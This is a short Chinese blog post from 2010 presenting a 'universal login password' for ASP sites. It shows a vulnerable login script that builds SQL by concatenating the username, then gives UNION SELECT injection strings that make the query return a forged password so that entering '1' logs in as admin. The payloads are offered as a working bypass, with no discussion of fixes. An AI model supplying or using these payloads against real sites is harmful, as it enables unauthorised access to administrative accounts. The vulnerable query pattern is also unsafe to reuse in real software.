查看文章
 
ASP注入万能登陆密码
2010-03-29 15:45
oldjun提到一种新的万能登陆密码。比如网上有很多这样的登陆验证代码:
  程序代码

  <%

  username=trim(Request.Form("username"))

  password=trim(Request.Form("password"))

  sql="Select * FROM admin Where user='"&username&"'"

  Set rs=Server.CreateObject("adodb.recordset")

  rs.Open sql,conn,1,1

  if rs.eof then

  checksysUser=FALSE

  else

  passwd=trim(rs("pwd"))

  if passwd=password then

  Session("admin")=username

  checksysUser=TRUE

  else

  checksysUser=FALSE

  end if

  End if

  rs.close

  conn.close

  if checksysUser=true then

  Response.Redirect("main.asp")

  else

  errmsg="<font color=#FF0000><b>用户名输入有误,请重新输入!</b></font>"

  end if

  %>

  先在数据库中查询用户名对应的密码,然后再和用户输入的密码对比,导致'or'='or'这样的万能登陆密码失效。

  但如果在上面的程序中,用户名输入 程序代码

  ' UNION Select 1,1,1 FROM admin Where ''='

  ,密码输入1,就可以登陆成功,原理很简单,就不多说了。

  顺便附上oldjun的语句:

  程序代码

  ' UNION Select 1,1,1 AS pwd FROM admin Where ''='


类别:Web| |分享到i贴吧|浏览(225)|评论 (0)
 
最近读者:
 
网友评论:
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
     

   
帮助中心 | 空间客服 | 投诉中心 | 空间协议
©2012 Baidu